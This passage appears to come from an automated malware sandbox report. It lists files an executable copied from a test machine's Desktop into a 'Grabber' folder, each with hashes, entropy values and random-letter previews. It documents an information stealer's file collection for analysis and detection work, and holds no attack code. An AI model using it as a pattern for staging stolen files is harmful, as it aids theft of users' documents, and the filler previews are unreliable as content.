Preview:	MNULNCRIYCLQPFRTTBIRJXLLXDPOIGHIWSMRZAWOWMFPIGBQDOQPBHCVDNAEFVPPKLZOIKPKFYDTDOGMSIUWATNOJJJSNKBWJHKKWMUZDRGJJNWUASOTXKYYIZLCOHDOBJPMAPIXVROTWYIYRPFZWZLECCXJOFYKKMMQGDBCRRZBEIALJQWFBIRGZWKKZNILSZURIFNVYXWPHRMYGXATLINJURPYVWCXYNUAESGKBUAMJTBBSVQQAIZKUVJSGVILJMHXCRFQYYXESEYBSMBQEHOEREHZFHPFENYHMHULCMQJKSSZLDDCMPWESAOKZQCENLMVXZGUVHNVUKXEWENTAXUEHCWCADQIRNYDFQPSQSUSDTQUVKPDYTOYMXIFXIMYDOEFHNJDKHPJDUFNMBXUSNDPQKBSTIVTXYHJYKOGCJMZHQRQQDXTWGEMBAJZIDXHPCGJTNITUFATHMPLPFJLWOPXNLVVCCPOQFCWKUCSSMFUWUXSMBYFBMUPJSINHRBJCPPQTSNUWCSGVBNMGEVXSQAUHMBGCNHVBRKKXPGDWRHAWFZYIGXLNCPKSLAZERFWOQNQAXTGZOWNEPLIJOXTLEMUDNYMQCRGFNMOCSUXSKKUKSNFLMUYAVMFWVWOEHAYJWOLYNYYTGSCYSYAJVUNEZQYLOBOCROMKWXPJGQVMSTNKYJEQCUQCBVMAJBOALKJAPYUEVMIWWFMSPLPSKKZMKNEKPQGDNBVBYHNPDIQEEKXUZLGWXQGDQZEHBMYYFUDFGNLYGARBRCREXIQUUWFEXDYINDKFJACYETJBANLSCEYWEBIPFZEOGUWOHBPBFLDAELAEPFOIZRSYWISCBUYPUAHWUVAIRDXHGXUQNAEDFFRDSODQFGQLGCIHSIWHVUDCTSMIQTMXSFNUPKSLBDPGVPMZPHIEMSXUQSRIGGMHVDMGMPEPCJPZBENUEBMZNZVWTRCVAGRSYRBZLOAETCXTWCINHSWQQFCHATVQRGJ

C:\Users\user\AppData\Local\32994a3dcd128eb1bed26629f65ce081\user@536720_en-CH\Grabber\DRIVE-C\Users\user\Desktop\QVTVNIBKSD\PSAMNLJHZW.xlsx

Download File

Process:	C:\Users\user\Desktop\FUEvp5c8lO.exe
File Type:	PSA archive data
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.698960923923406
Encrypted:	false
SSDEEP:	24:mGnbK2uIv9xuPtDhsIChdpYx5eCmVRCqmDCL4yq/6jv:fpuVKIChHYve9RC2LpEK
MD5:	186B4E00711974F7AF578BD6FF959BBF
SHA1:	642B794D73FB09655FBFF8EDCAAA267634554569
SHA-256:	2505B69640298D08BF2DC435A6D289C1FE7ABB349D2017F63EAD8CD2C94199EF
SHA-512:	DD6260B7AF96C7449D3DB4826888F7EAD8F274F9E170E103D588B0AB00A044B5978544A10F7B3C0C8464B74FD10B087C5671177AC1468D7F172DF4E7644A336E
Malicious:	false
Preview:	PSAMNLJHZWSQDMAZGNPSQVJPYSFUCTTGDJYZLMXSOOEBVYTMYXCFKBUKVYFFHMXRUCYMSTINQFSWBKGZHWWOXSUHIJJAHELKVUMDNJZMRMZFKOUIQGCNVNZVXKWKRUMIVVNVMXPLQTYNNEISPTFLHCHCESXNGLPJCEUOVDOFSSNZDEVGGWGRIJYDNPIXZZQRIXXGAVNXXGMBNWDRPEIKJPBTWXUETHQXVKVNRJASMGUWQWQPUCAORVUSLGQPHEZAOFOACKQOBETERETOORPNJFKDGTDRHKRKEEAGCTYGGVCLOVTVNKIGBHRQXIREFRVVEMBZIDHIFEIOHPIJYGZWGTQWILPNZTDESONAGSHAQLUAVRKHMFOMOQYJXRVMLCUUJVOTUCVOEBKITXOZUZGZKCYNALMRPHSNXGINUBTOYHFDFQLRSZOZWPZGUFGNQWCZHZIXHOYMIXONKNPROHQRYFNTXULDHBFGYLGFAUXJWMFXTRDTCJKCQRMPSJWGMOUCEGLQWZCNKFEKFEUJJIUNMHRRSZPYMRYVQQYYPMGHHEKAQFKKXELSAQQLSLKKUPFWZCMCMFAINYSBZBCFXHKVLASFVZCXQXXXZLHZDHVGKAFBMUFYPUMCUFVZMLVFPOUFRVLCXBIJNSPUAJZYMLVZAAGXYNUCZCXJWFYMHPNYUZQZEKWRMDNWTUBEAPAAIVGGSWPFGRSUHMUGOYCHHBOMRHKMENUQTICOXQBOTOWXHARDPYNZYJCISYKDDFBREXFJNPUTCEDQXTRWWXEGLPLZBRUZXKHOJYFWTASZSDLWXBSEYMHYXZCADAYDPKFTVEVMYYPXPKGKKZUPTORUPLLMBXPDGYHRPPKYZOAWNEPPXHMTQWXMSQFVUTRDJEQKYSLZXRWAHJVOXMIJIPEMOVSQXZXCXSWRQRFYBFUTICJAAGKRSNWDBSGSEWJUBOEPILXBOYUDRCBRFHNBWDQPKBAZMBFBVNFLUTVKABREBJZU

C:\Users\user\AppData\Local\32994a3dcd128eb1bed26629f65ce081\user@536720_en-CH\Grabber\DRIVE-C\Users\user\Desktop\QVTVNIBKSD\QVTVNIBKSD.docx

Download File

Process:	C:\Users\user\Desktop\FUEvp5c8lO.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.695938097013837
Encrypted:	false
SSDEEP:	24:z3kwMX3+NBj4ilMczAMBVgs3WrV8bfMbETQzpns7vh2HCpPQ:bkww3UGiJyGWr3RMvh2HC9Q
MD5:	DC3E834A02B2C81DF0167ACE639BA00F
SHA1:	32859A24EE65CBB3BD804D02639FCC4745C1CBC9
SHA-256:	0034D483C5EB801444D442E100E6B97859FB3752243C3323578F94083F469A29
SHA-512:	CA0BEDA568B13F4522ABFCBD8E73CD96AEEF991C8896E5C9F03D999722498840CFF29265340F8D86267E8E134085300FF8D42EC5E4741229332DEAD4B30E6D0F
Malicious:	false
Preview:	QVTVNIBKSDCTAQBGAOXCDNDJJSYXWJGWLNQZGTIRDPOXBJKWLQKQGHTGEEYZCSQXRIHLQYWVXDHEUMWEKWFGJLMYICQYBHNEZJWDJOGRRNRTOYBVHVOADCWLJBCJDEJQGWHIISDSHGZRWITARTFGZLYVQWZDXCBALJESXBFEMTGTIZQWIKXFTDQGTAMDONWUIJUYOKJXLUTMOCIHGFKUVWTZWGGDCWXLKJNCFYDCGKWQMLFWZQSHHWIEETWTGXVBHMSPQQUETSKWPAJFMRFRCHDNYKBAAHPLMJRBBAJTVLLAUUCLJYJMJLBKQGNTWGMPYQTUPYRFGMYPSFAZKFDAZPZSDSLLFCSCKJNYWUFBZSQQHSKWDGIBILREFDZJQVIODCTVEDOBTVFRFOHJOUFGKJWSBYWFYBYTUGQGTLYPZCUIXPOJLCNPDOVBXWCGCWSAJJFYOSWSVKPATDKQJRADERJVQVTQESFPSXRVBVEDLVTQYWXVFAKVPURCBYBIAPAQUFQNNEYDRUYBOOCMWAVFRHNFPGDIUCRWCXKMXPIRSBECJROTFLGGLOLFKFRGHTSAIKSQPSZXJDXWBHZHVBFILAACTJHJEQBYDONPYTGLNXEZPFCIDHTTHGIOFCTFHRHIJGRCZPVJAOXIBAJIEMVNELYPQKBHQECWJYTAPCZMZNVFUTOKDAKOXRQKSDSHHXCNPTOQACAKMZSIGEKSTZYQWWAIYNMYZGDCJITHDWZHQWHGDAHXUUSQNHSEWLINMAVJEJLBWIZQNZHARGRNBGZEQKQKZKRPFIWNXAVGMLKQJEJDYBDRSHJBULSDTLIKLIFONGYGERWNAHSKLLHMDBCSSWVOEIGUACWQMNZYBQMRIYIQZQOYRZUOCZWOMBFRIJMVRKAWJHTMEMGVQYWBBMYZGCFTJKRLDPFOIYFDWQUEGJXKLKIPLVLNTFZCDKJMEKYNPPGPMXAGDHXGEVWCGIHPFBAPAKCGGKURXQFPUIQV

C:\Users\user\AppData\Local\32994a3dcd128eb1bed26629f65ce081\user@536720_en-CH\Grabber\DRIVE-C\Users\user\Desktop\QVTVNIBKSD\TQDGENUHWP.png

Download File

Process:	C:\Users\user\Desktop\FUEvp5c8lO.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.696312162983912
Encrypted:	false
SSDEEP:	24:G1O/dOdJXH3hrdB2Swsk4go3oInr8X513aQRmy8:Gk/8ASwsk4+p13aQRmy8
MD5:	83B91EFB8185C5AF5A6B60F4FE9CC2D2
SHA1:	0EB7AE1817790DFC5225A02B74A272C84FEE4240
SHA-256:	8CA340B024C5A3134DE6C89C30C866FF4BCE5175C9E1A2F52075C0199BA1AE1E
SHA-512:	F8445B5F18C9F48EFB98B6A310CD757314DA5173FD3490357672B51FED3FF72FF5095E0D17C829D96DE873FC70358D25B7D6369D3458E3AD9BF8D81A5158E46A
Malicious:	false
Preview:	TQDGENUHWPOCQZOYQQOVXFSKSTVMXJXDOGOCIXCWWCXZFXOXQRGWSWDAFLWSMHLOUKOWNWJZPGDUHFUOAFKMGKZSPLKHWSRWYDTUFQOCIDPUEJWNIBXMGMKONCTOFFHYQKJVCNHZNUJEOZENPYTNSRLJTSURGKKJCGXUYFVMRAZPMGMDFRPRULQNWCKIPLLNINZSUGVTDCGZRWHZSXIUPCOMERQUITTFVYNMJAILLEFBCIQKNYWQSMDKSPSFLHLQBLKQAEZLJWWEWETIASOLCSWFIXBUJNPPEHQBZSFNEUZFVYKPQARONAVPSWNEPHPCPVTKNOEKMSHCSJAPMMZNDUPXNUGZKLFLOSEJTWSTMGTHPBJYPYNXJEWKYXAKPNBGAIGQOTOBFIGYXOMEBYKJUBUPHBKYEZJVKWOADWXTWXLHTSSJJEERVQTAWAOSLBHXXTKQCBLUENVULQPPPVUVFHCENGXCXUSAZURTDXJOJRVDUZPYWRIUSKDWALNPHAPYXYAERIQLWZTHISZCPAZAYJUBWJKBPUIGQPXVFOKOOGOSRASRQRXJZKSCRTHITTCLDLPTEZZSZSDTBFLVSLNNNCFBQWXQTNNRLQJVYZMPDHMVNLLNOLJVTFFUHUBHWDTBQKSTZEJFYHQBZJSAPJXIHOPGXRYNJUZKHMXOGNCKLDPKDLFZKFWOTJGQBXZEFMAORUVHQXYVLBLBKUEYUWVIBYNGTPNSHZOAVYSECDNRJFEGATTFBNLTQQUDTNINSTLBVFBUSUTOHOOYLKJQMLOIFMKXGXCKWFSCHWJWRKMACAXTEHDSMYMGSWIIEYXHNGOVDUHWQGNNBGIFZMCRKAOJVZMMWSNYYKMFTRQPINRLBTNCHSQPNQPZMLLJEOZIIMQPOJUGCVEYNAAXXWRXITWSOITACOECPNTBINMRHSPKJBVHYDZYLQUMSXHKEBERJIZQEQTSXEYVHBIPMZLMZSQIREGSQGAJPZFYHOBSSQYU

C:\Users\user\AppData\Local\32994a3dcd128eb1bed26629f65ce081\user@536720_en-CH\Grabber\DRIVE-C\Users\user\Desktop\TQDGENUHWP.png

Download File

Process:	C:\Users\user\Desktop\FUEvp5c8lO.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.696312162983912
Encrypted:	false
SSDEEP:	24:G1O/dOdJXH3hrdB2Swsk4go3oInr8X513aQRmy8:Gk/8ASwsk4+p13aQRmy8
MD5:	83B91EFB8185C5AF5A6B60F4FE9CC2D2
SHA1:	0EB7AE1817790DFC5225A02B74A272C84FEE4240
SHA-256:	8CA340B024C5A3134DE6C89C30C866FF4BCE5175C9E1A2F52075C0199BA1AE1E
SHA-512:	F8445B5F18C9F48EFB98B6A310CD757314DA5173FD3490357672B51FED3FF72FF5095E0D17C829D96DE873FC70358D25B7D6369D3458E3AD9BF8D81A5158E46A
Malicious:	false
Preview:	TQDGENUHWPOCQZOYQQOVXFSKSTVMXJXDOGOCIXCWWCXZFXOXQRGWSWDAFLWSMHLOUKOWNWJZPGDUHFUOAFKMGKZSPLKHWSRWYDTUFQOCIDPUEJWNIBXMGMKONCTOFFHYQKJVCNHZNUJEOZENPYTNSRLJTSURGKKJCGXUYFVMRAZPMGMDFRPRULQNWCKIPLLNINZSUGVTDCGZRWHZSXIUPCOMERQUITTFVYNMJAILLEFBCIQKNYWQSMDKSPSFLHLQBLKQAEZLJWWEWETIASOLCSWFIXBUJNPPEHQBZSFNEUZFVYKPQARONAVPSWNEPHPCPVTKNOEKMSHCSJAPMMZNDUPXNUGZKLFLOSEJTWSTMGTHPBJYPYNXJEWKYXAKPNBGAIGQOTOBFIGYXOMEBYKJUBUPHBKYEZJVKWOADWXTWXLHTSSJJEERVQTAWAOSLBHXXTKQCBLUENVULQPPPVUVFHCENGXCXUSAZURTDXJOJRVDUZPYWRIUSKDWALNPHAPYXYAERIQLWZTHISZCPAZAYJUBWJKBPUIGQPXVFOKOOGOSRASRQRXJZKSCRTHITTCLDLPTEZZSZSDTBFLVSLNNNCFBQWXQTNNRLQJVYZMPDHMVNLLNOLJVTFFUHUBHWDTBQKSTZEJFYHQBZJSAPJXIHOPGXRYNJUZKHMXOGNCKLDPKDLFZKFWOTJGQBXZEFMAORUVHQXYVLBLBKUEYUWVIBYNGTPNSHZOAVYSECDNRJFEGATTFBNLTQQUDTNINSTLBVFBUSUTOHOOYLKJQMLOIFMKXGXCKWFSCHWJWRKMACAXTEHDSMYMGSWIIEYXHNGOVDUHWQGNNBGIFZMCRKAOJVZMMWSNYYKMFTRQPINRLBTNCHSQPNQPZMLLJEOZIIMQPOJUGCVEYNAAXXWRXITWSOITACOECPNTBINMRHSPKJBVHYDZYLQUMSXHKEBERJIZQEQTSXEYVHBIPMZLMZSQIREGSQGAJPZFYHOBSSQYU

C:\Users\user\AppData\Local\32994a3dcd128eb1bed26629f65ce081\user@536720_en-CH\Grabber\DRIVE-C\Users\user\Desktop\TQDGENUHWP\DTBZGIOOSO.xlsx

Download File

Process:	C:\Users\user\Desktop\FUEvp5c8lO.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.705615236042988
Encrypted:	false
SSDEEP:	24:B65nSK3I37xD9qo21p9G7ILc3pkowOeuiyJRdt7fXzyxu3f7Lj8X2:B65SK3Xx1OXpkowOeMJR/fzeYX8X2
MD5:	159C7BA9D193731A3AAE589183A63B3F
SHA1:	81FDFC9C96C5B4F9C7730127B166B778092F114A
SHA-256:	1FD7067403DCC66C9C013C2F21001B91C2C6456762B05BDC5EDA2C9E7039F41D
SHA-512:	2BC7C0FCEB65E41380FE2E41AE8339D381C226D74C9B510512BD6D2BAFAEB7211FF489C270579804E9C36440F047B65AF1C315D6C20AC10E52147CE388ED858A
Malicious:	false
Preview:	DTBZGIOOSOGIXCBMGZZTWMBQXGHIBDIDBNCACFDFVBOXTDUUJMUMBAKZSHFEIWNQHEECYVTVTSOTORNQIPIDARMCQDPQAFMDPEUWMOYTBCDCAYVFJLXBCNSKBDWMSQYEQYRUTREAZDRNQIZYXPRJXUJXDYZYLJWOVPCEZSCSUSREYDMTRVOKIKSVPBPVQFMFFQNUDCCBDNGIIDGYMQHFPEMCFEOSEKVDEHVQZBXIBJURBZFVTYETURFSVIYLBMHJKBCAPGOAJJFKOTEXRMHREBNTBJGLLRAKZHXKTTSKEXODMEVVGUJOGNLYLFYGHQIBHAFRVYETMDPLEXBQXLVWYLIMFCJAKPFWSQSVSWYINAAOPMCAAVTIWDFRPKUBYLVKYRNUDCLWZJHLKSXWPDEXGEVUQVEJQWTUUYNTOIRLKQTXRWJHCSMGZWWPGPBFZQLOSDMHAPKSMVNNMIVJAORPRFUXPDROELZMLHAIBRVVWUMSDWFAHIBDVMGGFRISFYQZZSESXHMSUQCQPXBCPTAZBJXKKLRBWEZYGWRXBBTYWRRUXCBJIWCOYQKBQCGCZCPFVLGETTTZLEFZDQMQFHJVERUYLQUPVYRNXQJRLPUBWWQHPTYNORTRKKOMLWKAQZNHZQUJGTIYVIKGAWLHSALTZENHAAJKNKUBSQXDVFQRUFJLDFZAQUPCRNDOOEIALNCMGYLCEZSLPOPYEKIEYDRXSDONBFKQKQMAWBJULDADUHXOQGQLIDEPZRHMCBVTLCJUGOZRYCGXCXPEOJTGJORAEJKASXKARQEVOHMITSWHQEWOJXNOGSKWUQQTSOSWSCCMOUDMMHPYKEAJECJSGTBNPSFVWSGFBKGSKEHVLWONOMPOOJEJHDMKGRPCSBYWCZNHTWZCKQNEGEYABJZETYLVHROKZJAIGKJDHLJBRYOVDHNANLCJBHTDDRPXIXDIHNWDDQDHPSAKZRRXOFYYXZWQWZFESELWVMUIBHMCLVZP

C:\Users\user\AppData\Local\32994a3dcd128eb1bed26629f65ce081\user@536720_en-CH\Grabber\DRIVE-C\Users\user\Desktop\TQDGENUHWP\KZWFNRXYKI.png

Download File

Process:	C:\Users\user\Desktop\FUEvp5c8lO.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.694982189683734
Encrypted:	false
SSDEEP:	24:MggAXr5945qa/jgwHvsjCIShLGmTSIp/6co4rHg+X:MgJXr5+pjBsUhJTSIGA
MD5:	E49F84B05A175C231342E6B705A24A44
SHA1:	41B4E74B5F82D72435DFF38DD1B8B6026691CB4E
SHA-256:	EE0E867E83FE0206F33F009F216D2986AE3903B6F8944FBE2CC36586E5844626
SHA-512:	84E29127671A2D2539F2E340C3465736F68C5545A256F9C2813B6BF955645A629FD80BCFF7CEC902F07492C1E40C0794C2D3A906DD402BACA5E647BDFA2B88AA
Malicious:	false
Preview:	KZWFNRXYKIQQDFEFEKFUFTLSCHHVHHFJVLINSSPODUWFGYCFXENRRFQZQNVRFJLXTKRPVZFZUDBIVIHPJCTZSMJNOWNCQAPYYHLTMHJJYECMUWUKYXMYBEVYHAFCNHVTPHXQKEQMWLDZKOKDMDUORJRRWKHVJLZNSFERFDAFUHPRYSOCWFZCHPEXICNDGFOZLLLNASUKYIOHUBCGSHVHTAAMQFTBUNSBDIPJOCUDVCBYOUPDCATAMJESONSVVDFARQOQHDTKDRVDWNHMPSWQTCDBOSQIMASLDMFOKOIPUFJNASKNMQOVCYYFVCKNWJBVIBCWMYJGLWMAZWJABPWRYFHPZVZTRFLFKJIVQMYASPFSBODYXKEEFHBTFSHZEWSGAGGMSRRYSACIWVPBTHVGVVYONDRAYVOWBYTTLWWPGWQAJDLYFDALUZCIBUOEBMSCKJILYNBNADCKXDVTLOFEMKULPCSYYTTPBZKLBPMPEQZHPJCMRWISRYUKSYBUOCFXUPORADUTYINWCOLTVNYNBVHTATWIAMJBNCYZTMQLJOZXQMVQWJAGLZBDTPNMMKABCUCOYDSRVMYDKVJFRZRLIKSQNEMHUWIXWIACERSGEBQFEQJLXFLCITYZWKHIASCUIPVHOXQGWHFWSXEHOMVVXNFDEKOTOBBAEPJTBOCEJGWYSJBHWDRPPONMLWEDWWLGQVWLLREHLEZFZNEDNRDQMBTZWCUIFLPBHTTQGIEVFRJKMYLHMYUOCAAUGIRMYSCUPKJDFUJBVKKJHICSXHPXWUGXGPHCKBZLZXDCKURFIMZGIDDJWPBHEERWPLLCNTTKZRNYIMGHNYECXBHHHWCVILLPFPVXYOQODPYIIVKTOODIUKCMBBWHUEFORQUJCVYVBOBKKLPQJMOJEUOFUFAAJRTAZTXJJQPOORSRNCQDMHWVYQIGGCMZGYMXIBAKRNOPIPQWJHZEWBBJTYBESJTCCPYZHONYNVOXCBHCXRST

C:\Users\user\AppData\Local\32994a3dcd128eb1bed26629f65ce081\user@536720_en-CH\Grabber\DRIVE-C\Users\user\Desktop\TQDGENUHWP\LTKMYBSEYZ.jpg

Download File

Process:	C:\Users\user\Desktop\FUEvp5c8lO.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.687722658485212
Encrypted:	false
SSDEEP:	24:gTVIxDsK0PxMQbXpEHH8+976o9VWmCUGGFT3IIU8wyG33bu3jUn:gZIxDW5lj02otC1G5IIUF/n
MD5:	9A59DF7A478E34FB1DD60514E5C85366
SHA1:	DE10B95426671A161E37E5CE1AD6424AB3C07D98
SHA-256:	582393A08E0952F43A544A991772B088CC77CE584F8844DE6C5246BA36E703D5
SHA-512:	70B4673D358E097AB2B75633A64A19C16E1422C81B6B198D81BF17B7609BFB4ACF5DE36228FF3884C5B9BA0A15E13F56C94968E5136B497C826F3D201A971B00
Malicious:	false
Preview:	LTKMYBSEYZYLWBDLQYQSGHCEKOMUGSMOJLJVFHAICZAEQCNCBEGUYSPUJHNJSDQTVUPUFCNWSVXGWFVWMFIWRQGVLGYUUBXDZXYJMKPAQTJLYUZTWHPYSRLPQBTKDHEWTTWLDXITQQAGNHQLMCYZCGICKEHUUXVCXHMYJQQYOQIXMRPWDNHFRXHXUHBSJQQHJNETRHWEBONEJBHTDQQNCEMAEDULTTSDIGDGEYCFSHOYFMDRTHCJKCFEFLMLVJNHUTISDTYYKQXVYELRXTCPVMTHGMXSDMUSFEPIIFBHCRRCGWXNWEXQGIUUAYBLCIBZGCXXZYYFPOIAUUAZEORINBBTOZEUXMAZYFVDWGLZZHOHNZHSEJYZULRNGAFKDQXEYHMJWAZXCTSLOIDSVWCDDAJVQOZRXWVWCMYQCKXRQMOHVCMJHXERQTMBGRETHKBIQULAPJVABDGMJDULEZZHMATXEUVKGXGGFBUQPNFRZOPVDFONCFHWZHXDJQQLBBLRNEDPABSGIFBWEQTJAGKFRSLLFIXBIADJYQFXLIYTRHHMHAEDZRJJZZSOCKJNBHWWZEZXGEEJOALVQSBDQTYEHCQVMQMBKNHLBFIRUKLCVRFKGJWGONQGFFIPLGGCUDTZOLCUDDOARJHBVHHRZEYWWKNFEXBVKDTVKTGDMSUOSIIJKKXODRUCUDQHPOJRJZICJUGIDYTFJNVOJIFAVDFPGFTUQFDWLLALACJUWFIKJDQRZQVIIULGPKDOEMRGWVXSLFQHDVZJLHRKVFDXZZCYMKQTRZIBEAHUAXZFKIOBFQACDYLWSHXGVQBAYTXLOISPDOUTEJPQXZNCWCWFKRYQGOEIQEKGUMTCROZMZMVLTCMMBZZHLSYRTDCWSSQEKPTOUQZYPJDCZQTZSHURDOLLYIYFPIECQEHEYPDXHDRIYSOEILWHEODCIXNORCUDGORDQCYVQHNTVIZVMIQLRODCUBWDVZCRJJNXNJQMHPXE

C:\Users\user\AppData\Local\32994a3dcd128eb1bed26629f65ce081\user@536720_en-CH\Grabber\DRIVE-C\Users\user\Desktop\TQDGENUHWP\TQDGENUHWP.docx

Download File

Process:	C:\Users\user\Desktop\FUEvp5c8lO.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.696312162983912
Encrypted:	false
SSDEEP:	24:G1O/dOdJXH3hrdB2Swsk4go3oInr8X513aQRmy8:Gk/8ASwsk4+p13aQRmy8
MD5:	83B91EFB8185C5AF5A6B60F4FE9CC2D2
SHA1:	0EB7AE1817790DFC5225A02B74A272C84FEE4240
SHA-256:	8CA340B024C5A3134DE6C89C30C866FF4BCE5175C9E1A2F52075C0199BA1AE1E
SHA-512:	F8445B5F18C9F48EFB98B6A310CD757314DA5173FD3490357672B51FED3FF72FF5095E0D17C829D96DE873FC70358D25B7D6369D3458E3AD9BF8D81A5158E46A
Malicious:	false
Preview:	TQDGENUHWPOCQZOYQQOVXFSKSTVMXJXDOGOCIXCWWCXZFXOXQRGWSWDAFLWSMHLOUKOWNWJZPGDUHFUOAFKMGKZSPLKHWSRWYDTUFQOCIDPUEJWNIBXMGMKONCTOFFHYQKJVCNHZNUJEOZENPYTNSRLJTSURGKKJCGXUYFVMRAZPMGMDFRPRULQNWCKIPLLNINZSUGVTDCGZRWHZSXIUPCOMERQUITTFVYNMJAILLEFBCIQKNYWQSMDKSPSFLHLQBLKQAEZLJWWEWETIASOLCSWFIXBUJNPPEHQBZSFNEUZFVYKPQARONAVPSWNEPHPCPVTKNOEKMSHCSJAPMMZNDUPXNUGZKLFLOSEJTWSTMGTHPBJYPYNXJEWKYXAKPNBGAIGQOTOBFIGYXOMEBYKJUBUPHBKYEZJVKWOADWXTWXLHTSSJJEERVQTAWAOSLBHXXTKQCBLUENVULQPPPVUVFHCENGXCXUSAZURTDXJOJRVDUZPYWRIUSKDWALNPHAPYXYAERIQLWZTHISZCPAZAYJUBWJKBPUIGQPXVFOKOOGOSRASRQRXJZKSCRTHITTCLDLPTEZZSZSDTBFLVSLNNNCFBQWXQTNNRLQJVYZMPDHMVNLLNOLJVTFFUHUBHWDTBQKSTZEJFYHQBZJSAPJXIHOPGXRYNJUZKHMXOGNCKLDPKDLFZKFWOTJGQBXZEFMAORUVHQXYVLBLBKUEYUWVIBYNGTPNSHZOAVYSECDNRJFEGATTFBNLTQQUDTNINSTLBVFBUSUTOHOOYLKJQMLOIFMKXGXCKWFSCHWJWRKMACAXTEHDSMYMGSWIIEYXHNGOVDUHWQGNNBGIFZMCRKAOJVZMMWSNYYKMFTRQPINRLBTNCHSQPNQPZMLLJEOZIIMQPOJUGCVEYNAAXXWRXITWSOITACOECPNTBINMRHSPKJBVHYDZYLQUMSXHKEBERJIZQEQTSXEYVHBIPMZLMZSQIREGSQGAJPZFYHOBSSQYU

C:\Users\user\AppData\Local\32994a3dcd128eb1bed26629f65ce081\user@536720_en-CH\Grabber\DRIVE-C\Users\user\Desktop\TQDGENUHWP\UMMBDNEQBN.pdf

Download File

Process:	C:\Users\user\Desktop\FUEvp5c8lO.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.695685570184741
Encrypted:	false
SSDEEP:	24:SYuCgqv/1uycbC6SHsJPWXpOxTeVtblICcFX4xlyzK7y45wR39IRh:S1CPvsC6YE+XgleVtbQuKGf5M39IRh
MD5:	A28F7445BB3D064C83EB9DBC98091F76
SHA1:	D4E174D2D26333FCB66D3FD84E3D0F67AF41D182
SHA-256:	10A802E683A2C669BB581DE0A192C8291DD2D53D89A2883A59CC29EB14453B93
SHA-512:	42526FEC4220E50DB60BD7D83A07DEB9D5BE4F63AD093B518E9ECC86B779210B0170F6F64C9F16064D50CB12F03643BAC9995D4F3C0AFD5F8D38428D57ADE487
Malicious:	false
Preview:	UMMBDNEQBNVIMBNGHYZCBKXWMQJKYISTANSRNFXXBKALIIEMEWAFQEPTEMZCIXXNMQBGOXWSDYSAWKIYPJITNREMVRXPPJZFUTMGRRRGTCHVLEWVUJGZEUQVONQVACEFWZUCIAFXPFGXIUOOBZEEMGMWJQIEKKICYJJWAFUKYZAJEGUQKGDPRPXCOWIPBRUGHWDFZLGSKZVCHVVPGLEFNGIVLBVNAOVXAPGATADJBIQTBNJGWXRSEYKCSVZOSTCBHYFHUDEWNGEIFCVREPZDZDZRITFEVFCQQWJYZXPUKJWHTWGWASTKDCAVEWZOIGFZHRWCJBVRLDWGVKPABCQUOHQIMLUFUGYGMPGPEMSRPPSGWIGRVPBGZIWLNEVYFFJBCMBSXVABNRNXULCTUAANAXDHKZOGVCNQZHMRBENWTTLQVVMDLNBEWHLPZHMPDGRLJWAQJDJRCWTFWIOLAURRCSMFJOCFDKUGPLTPABARXKPCRXOIHHVRWXAKGHOTYLCEQQYYDKVZQSYLCAEGGBQMMJGSNJWBTJXSVALINNRLURMPNGFXHJRVJIKQJSDLNIOXGIGDFDCOTGGXMDLTDYSIKCMPVINDDXXQCEQCRUBLFEWMYMSEGUHIKIGUYOMOXSKOTVNUNGWUFYKYRNZXOOTSRYXLZHRZXNEDJUNPYGNIIZSPVQBOLBRRRWGDMQWUTRSZWBYMXNMLKLFNZWJVDDPMJOXTVBMYRXNQFGBLURKFIUAHJBFFXNWQDYRLZADYGMETNXEOXLOJKYQPEYHUVTFGXQTGPQBWZQTVFXZFUVQERQZJCYYPFBYONAVFDOLTNRGWQYGSYWCWUWRETJZGVJMEFQTYPOLONVZFREVORMBQJOCLOALCJHHCHQSHKLUNBIRHRBSQSMERLKKFTGHUQKRPFIIELZZVXZVNHCIQYYXNMJNSOZOIRGGJKUWXNCWSNCFMGQIQVNKVIGRCLSDWQPEDLSLTGBRXRTMGFWYQSCLN

C:\Users\user\AppData\Local\32994a3dcd128eb1bed26629f65ce081\user@536720_en-CH\Grabber\DRIVE-C\Users\user\Desktop\VLZDGUKUTZ.jpg

Download File

Process:	C:\Users\user\Desktop\FUEvp5c8lO.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.701757898321461
Encrypted:	false
SSDEEP:	24:JTbqccbbEKOWHOHPG9HXJMTwDwW63KkUdx/d:JTbmzOxeRaTaq3KBL/d
MD5:	520219000D5681B63804A2D138617B27
SHA1:	2C7827C354FD7A58FB662266B7E3008AFB42C567
SHA-256:	C072675E83E91FC0F8D89A2AEC6E3BC1DB53ADF7601864DDC27B1866A8AEEF4D
SHA-512:	C558140907F6C78EB74EE0F053B0505A8BB72692B378F25B518FA417D97CCB2D0A8341691BECAA96ADCE757007D6DC2938995D983AAC65024123BB63715EBD7C
Malicious:	false
